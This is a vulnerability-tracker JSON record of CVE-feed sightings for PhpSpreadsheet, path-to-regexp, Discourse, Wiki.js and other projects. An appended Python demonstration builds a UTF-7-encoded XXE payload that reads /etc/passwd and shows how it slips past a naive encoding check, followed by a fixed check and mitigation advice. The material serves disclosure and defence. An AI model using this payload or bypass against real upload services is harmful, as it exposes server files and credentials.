{"vulnerability": "cve-2024-4529", "sightings": [{"uuid": "87c8ec80-e3ac-4728-b1df-bd05b362da83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45296", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113602650357813905", "content": "", "creation_timestamp": "2024-12-05T22:47:59.577069Z"}, {"uuid": "4773a1b6-a391-46c9-bb72-895977cc829f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45293", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2024/CVE-2024-45293.yaml", "content": "", "creation_timestamp": "2024-12-12T05:25:46.000000Z"}, {"uuid": "d706604d-26e9-4a2a-8849-3ee3e8c9f120", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45292", "type": "seen", "source": "https://t.me/cvedetector/7273", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45292 - PHPSpreadsheet Html Writer Cross-Site Scripting\", \n  \"Content\": \"CVE ID : CVE-2024-45292 \nPublished : Oct. 7, 2024, 8:15 p.m. | 24\u00a0minutes ago \nDescription : PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. `\\PhpOffice\\PhpSpreadsheet\\Writer\\Html` does not sanitize \"javascript:\" URLs from hyperlink `href` attributes, resulting in a Cross-Site Scripting vulnerability. This issue has been addressed in release versions 1.29.2, 2.1.1, and 2.3.0. All users are advised to upgrade. There are no known workarounds for this vulnerability. 
\nSeverity: 5.4 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"07 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-07T22:39:27.000000Z"}, {"uuid": "c3f517f9-f285-49aa-9e69-ecab55f4cffe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45293", "type": "seen", "source": "https://t.me/cvedetector/7265", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45293 - PHPSpreadsheet XXE Sensitive Information Disclosure\", \n  \"Content\": \"CVE ID : CVE-2024-45293 \nPublished : Oct. 7, 2024, 8:15 p.m. | 24\u00a0minutes ago \nDescription : PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. The security scanner responsible for preventing XXE attacks in the XLSX reader can be bypassed by slightly modifying the XML structure, utilizing white-spaces. On servers that allow users to upload their own Excel (XLSX) sheets, Server files and sensitive information can be disclosed by providing a crafted sheet. The security scan function in src/PhpSpreadsheet/Reader/Security/XmlScanner.php contains a flawed XML encoding check to retrieve the input file's XML encoding in the toUtf8 function. The function searches for the XML encoding through a defined regex which looks for `encoding=\"*\"` and/or `encoding='*'`, if not found, it defaults to the UTF-8 encoding which bypasses the conversion logic. This logic can be used to pass a UTF-7 encoded XXE payload, by utilizing a whitespace before or after the = in the attribute definition. Sensitive information disclosure through the XXE on sites that allow users to upload their own excel spreadsheets, and parse them using PHPSpreadsheet's Excel parser. This issue has been addressed in release versions 1.29.1, 2.1.1, and 2.3.0. 
All users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"07 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-07T22:39:18.000000Z"}, {"uuid": "adb60ec2-86a7-4def-b595-30172976730e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45297", "type": "seen", "source": "https://t.me/cvedetector/7283", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45297 - Discourse Information Disclosure Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45297 \nPublished : Oct. 7, 2024, 9:15 p.m. | 36\u00a0minutes ago \nDescription : Discourse is an open source platform for community discussion. Users can see topics with a hidden tag if they know the label/name of that tag. This issue has been patched in the latest stable, beta and tests-passed version of Discourse. All users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 5.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"07 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T00:19:45.000000Z"}, {"uuid": "6356939d-6ffc-4b8e-914f-423e05e63b5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45291", "type": "seen", "source": "https://t.me/cvedetector/7282", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45291 - PHPSpreadsheet SSRF (Arbitrary File Read and Remote Code Execution)\", \n  \"Content\": \"CVE ID : CVE-2024-45291 \nPublished : Oct. 
7, 2024, 9:15 p.m. | 36\u00a0minutes ago \nDescription : PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. It's possible for an attacker to construct an XLSX file that links images from arbitrary paths. When embedding images has been enabled in HTML writer with `$writer->setEmbedImages(true);` those files will be included in the output as `data:` URLs, regardless of the file's type. Also URLs can be used for embedding, resulting in a Server-Side Request Forgery vulnerability. When embedding images has been enabled, an attacker can read arbitrary files on the server and perform arbitrary HTTP GET requests. Note that any PHP protocol wrappers can be used, meaning that if for example the `expect://` wrapper is enabled, also remote code execution is possible. This issue has been addressed in release versions 1.29.2, 2.1.1, and 2.3.0. All users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 6.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"07 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T00:19:44.000000Z"}, {"uuid": "c037e3fd-3879-4598-94e1-ae36e9c9e5dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45290", "type": "seen", "source": "https://t.me/cvedetector/7281", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45290 - PhpSpreadsheet File URI Filter Disclosure vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45290 \nPublished : Oct. 7, 2024, 9:15 p.m. | 36\u00a0minutes ago \nDescription : PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. It's possible for an attacker to construct an XLSX file which links media from external URLs. 
When opening the XLSX file, PhpSpreadsheet retrieves the image size and type by reading the file contents, if the provided path is a URL. By using specially crafted `php://filter` URLs an attacker can leak the contents of any file or URL. Note that this vulnerability is different from GHSA-w9xv-qf98-ccq4, and resides in a different component. An attacker can access any file on the server, or leak information from arbitrary URLs, potentially exposing sensitive information such as AWS IAM credentials. This issue has been addressed in release versions 1.29.2, 2.1.1, and 2.3.0. All users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 7.7 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"07 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T00:19:44.000000Z"}, {"uuid": "91b81c28-9685-475f-9b4e-3c32037414bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45296", "type": "seen", "source": "https://t.me/cvedetector/5124", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45296 - Apache path-to-regexp DoS Regular Expression Generational Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45296 \nPublished : Sept. 9, 2024, 7:15 p.m. | 40\u00a0minutes ago \nDescription : path-to-regexp turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a DoS. The bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (.). 
For users of 0.1, upgrade to 0.1.10. All other users should upgrade to 8.0.0. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-09T22:20:19.000000Z"}, {"uuid": "e0b39041-4bb3-4dce-a81c-e56a1e9baadc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45298", "type": "seen", "source": "https://t.me/cvedetector/6003", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45298 - Wiki.js Account Restriction Bypass via Password Reset\", \n  \"Content\": \"CVE ID : CVE-2024-45298 \nPublished : Sept. 18, 2024, 5:15 p.m. | 40\u00a0minutes ago \nDescription : Wiki.js is an open source wiki app built on Node.js. A disabled user can still gain access to a wiki by abusing the password reset function. While setting up SMTP e-mails on my server, I tested said e-mails by performing a password reset with my test user. To my shock, not only did it let me reset my password, but after resetting my password I can get into the wiki I was locked out of. The ramifications of this bug are that a user can **bypass an account disabling by requesting their password be reset**.  All users of wiki.js version `2.5.303` who use any account restrictions and have disabled users are affected. This issue has been addressed in version 2.5.304 and all users are advised to upgrade. There are no known workarounds for this vulnerability. 
\nSeverity: 4.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"18 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-18T20:05:51.000000Z"}, {"uuid": "1633e4cb-bae4-46f3-9e9c-ac6a6335c5c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45294", "type": "seen", "source": "https://t.me/cvedetector/4975", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45294 - \"HL7 FHIR Core XML External Entity Injection Vulnerability\"\", \n  \"Content\": \"CVE ID : CVE-2024-45294 \nPublished : Sept. 6, 2024, 4:15 p.m. | 40\u00a0minutes ago \nDescription : The HL7 FHIR Core Artifacts repository provides the java core object handling code, with utilities (including validator), for the Fast Healthcare Interoperability Resources (FHIR) specification. Prior to version 6.3.23, XSLT transforms performed by various components are vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag could produce XML containing data from the host system. This impacts use cases where org.hl7.fhir.core is being used within a host where external clients can submit XML. This issue has been patched in release 6.3.23. No known workarounds are available. 
\nSeverity: 8.6 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-06T19:06:33.000000Z"}, {"uuid": "13012466-f50d-45b1-85ba-7eef9431360a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45294", "type": "seen", "source": "https://t.me/cvedetector/4983", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45295 - Apache vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45295 \nPublished : Sept. 6, 2024, 5:15 p.m. | 39\u00a0minutes ago \nDescription : Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-45294. Reason: This candidate is a duplicate of CVE-2024-45294. Notes: All CVE users should reference CVE-2024-45294 instead of this candidate. This CVE was issued to a vulnerability that is dependent on CVE-2024-45294. According to rule 4.2.15 of the CVE CNA rules, \"CNAs MUST NOT assign a different CVE ID to a Vulnerability that is fully interdependent with another Vulnerability. 
The Vulnerabilities are effectively the same single Vulnerability and MUST use one CVE ID.\" \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-06T19:56:50.000000Z"}, {"uuid": "f48b2573-1719-45c3-bfb9-cff3ba5c0010", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45295", "type": "seen", "source": "https://t.me/cvedetector/4983", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45295 - Apache vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45295 \nPublished : Sept. 6, 2024, 5:15 p.m. | 39\u00a0minutes ago \nDescription : Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-45294. Reason: This candidate is a duplicate of CVE-2024-45294. Notes: All CVE users should reference CVE-2024-45294 instead of this candidate. This CVE was issued to a vulnerability that is dependent on CVE-2024-45294. According to rule 4.2.15 of the CVE CNA rules, \"CNAs MUST NOT assign a different CVE ID to a Vulnerability that is fully interdependent with another Vulnerability. 
The Vulnerabilities are effectively the same single Vulnerability and MUST use one CVE ID.\" \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-06T19:56:50.000000Z"}, {"uuid": "bab538ba-918a-4baa-b343-aafceec95f59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45296", "type": "seen", "source": "https://gist.github.com/EduardoCorpay/fdaeb4ec65cc4a1c8fcd2fb0162de09c", "content": "", "creation_timestamp": "2025-06-11T15:29:00.000000Z"}, {"uuid": "2a0cbfb2-db9b-4cce-989f-a7ec747a8343", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45296", "type": "seen", "source": "https://t.me/cvedetector/12148", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-52798 - path-to-regexp turns path strings into a regular e\", \n  \"Content\": \"CVE ID : CVE-2024-52798 \nPublished : Dec. 5, 2024, 11:15 p.m. | 42\u00a0minutes ago \nDescription : path-to-regexp turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. The regular expression that is vulnerable to backtracking can be generated in the 0.1.x release of path-to-regexp. Upgrade to 0.1.12. This vulnerability exists because of an incomplete fix for CVE-2024-45296. 
\nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-06T01:23:56.000000Z"}, {"uuid": "80b27679-76e1-45e7-93ba-5e6bf44d1ad7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45299", "type": "seen", "source": "https://t.me/cvedetector/4962", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45299 - alf.io Unescaped Text Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45299 \nPublished : Sept. 6, 2024, 1:15 p.m. | 23\u00a0minutes ago \nDescription : alf.io is an open source ticket reservation system for conferences, trade shows, workshops, and meetups. Prior to version 2.0-M5, the preloaded data as json is not escaped correctly, so the administrator / event admin could break their own install by inserting incorrectly escaped text. The Content-Security-Policy directive blocks any potential script execution. The administrator or event administrator can override the texts for customization purposes. The texts are not properly escaped. Version 2.0-M5 fixes this issue. 
\nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-06T15:46:00.000000Z"}, {"uuid": "1c764d51-70f1-4426-80ef-da72a5269882", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45292", "type": "seen", "source": "Telegram/oJP4qItMuRLF_d8pKEvI9dzkUh7fXmzMd6ELp7Xw-az4Jzf3", "content": "", "creation_timestamp": "2025-03-08T04:35:51.000000Z"}, {"uuid": "ddea089c-e595-43b6-ab6f-d0e936ee5504", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45293", "type": "seen", "source": "Telegram/EE3pHbPRRhxISM-XwfNigq155t5OMi9Cg7kQXW9PN89zqyYI", "content": "", "creation_timestamp": "2025-03-08T04:35:51.000000Z"}]}
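The encoding-declaration bypass described in the CVE-2024-45293 sighting above (a regex that only recognises `encoding="..."` or `encoding='...'`, a fall-back to UTF-8 when it matches nothing, and a DOCTYPE check that then runs on undecoded UTF-7 bytes), as an added example that is not part of this record and not PhpSpreadsheet's own code. It is written in Python rather than PHP and is modelled on the description only: the two regexes, the function names and the sample document are constructed here as assumptions, and the naive pattern is an approximation of the flawed check, not the upstream source. The UTF-7 shift sequence is built by hand so the bytes on the wire are explicit, since RFC 2152 leaves it to an encoder whether characters such as `<` and `!` are written directly or shifted.

```python
import base64
import re

# Added example (Python, not PhpSpreadsheet's PHP). It models the flaw the
# CVE-2024-45293 description gives: a scanner that looks up the declared XML
# encoding with a regex, falls back to UTF-8 when the regex finds nothing, and
# only then searches the text for DOCTYPE/ENTITY. Regexes, names and the sample
# payload are constructed here and are not taken from the project.

# Modelled on the flawed check: only encoding="..." / encoding='...' with no
# whitespace around '=' is recognised (assumption: the exact upstream regex differed).
NAIVE_ENCODING_RE = re.compile(rb'encoding="([^"]*)"|encoding=\'([^\']*)\'')

# Tolerant check: the XML declaration grammar allows whitespace on both sides
# of '=', so the lookup must accept it too.
ROBUST_ENCODING_RE = re.compile(
    rb'encoding\s*=\s*(?:"([^"]*)"|\'([^\']*)\')', re.IGNORECASE
)

DOCTYPE_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)", re.IGNORECASE)


def utf7_shift(text: str) -> bytes:
    """Encode text as one RFC 2152 shift sequence: '+', base64 of UTF-16BE, '-'.

    Padding '=' is dropped as the RFC requires; the leftover bits are zero, so
    a conforming decoder accepts the run.
    """
    b64 = base64.b64encode(text.encode("utf-16-be")).decode("ascii").rstrip("=")
    return b"+" + b64.encode("ascii") + b"-"


def build_payload(spaced_equals: bool) -> bytes:
    """Constructed sample document: the DOCTYPE is only visible after UTF-7 decoding."""
    eq = b" = " if spaced_equals else b"="
    hidden = utf7_shift('<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>')
    return (
        b'<?xml version="1.0" encoding' + eq + b'"UTF-7"?>\n'
        + hidden
        + b"\n<x>&xxe;</x>\n"
    )


def declared_encoding(xml: bytes, pattern) -> str:
    """Encoding named in the XML declaration, or UTF-8 when `pattern` finds none."""
    m = pattern.search(xml[:512])  # the declaration, if any, opens the document
    if m is None:
        return "UTF-8"
    name = m.group(1) if m.group(1) is not None else m.group(2)
    return name.decode("ascii", "replace")


def scanner_rejects(xml: bytes, pattern) -> bool:
    """True when a scanner using `pattern` for the encoding lookup blocks the document."""
    try:
        text = xml.decode(declared_encoding(xml, pattern), "replace")
    except LookupError:
        return True  # unknown or empty encoding name: refuse rather than guess
    return DOCTYPE_RE.search(text) is not None


def demo() -> dict:
    """Run both scanners against both declaration spellings; True means rejected."""
    results = {}
    for label, pattern in (("naive", NAIVE_ENCODING_RE), ("robust", ROBUST_ENCODING_RE)):
        for spaced in (False, True):
            results[(label, spaced)] = scanner_rejects(build_payload(spaced), pattern)
    return results


if __name__ == "__main__":
    for (label, spaced), rejected in demo().items():
        decl = 'encoding = "UTF-7"' if spaced else 'encoding="UTF-7"'
        print(f"{label:6} scanner, {decl}: {'rejected' if rejected else 'PASSED (bypass)'}")
```

With `encoding="UTF-7"` both scanners decode the document and see the DOCTYPE; with `encoding = "UTF-7"` the naive lookup finds nothing, treats the bytes as UTF-8, and the base64 run hides `<!DOCTYPE` from it, while the tolerant lookup still decodes and rejects. The tolerant regex closes only the gap the advisory names; a scanner that decides whether to transcode at all from a regex over attacker-controlled bytes is still trusting that metadata. A stronger position for a file-upload path is to allowlist declared encodings (UTF-8 and UTF-16 are enough for XLSX parts) and reject everything else before the DOCTYPE check, and, as the sighting says, to run the fixed releases (1.29.1, 2.1.1, 2.3.0) rather than rely on a front-end filter.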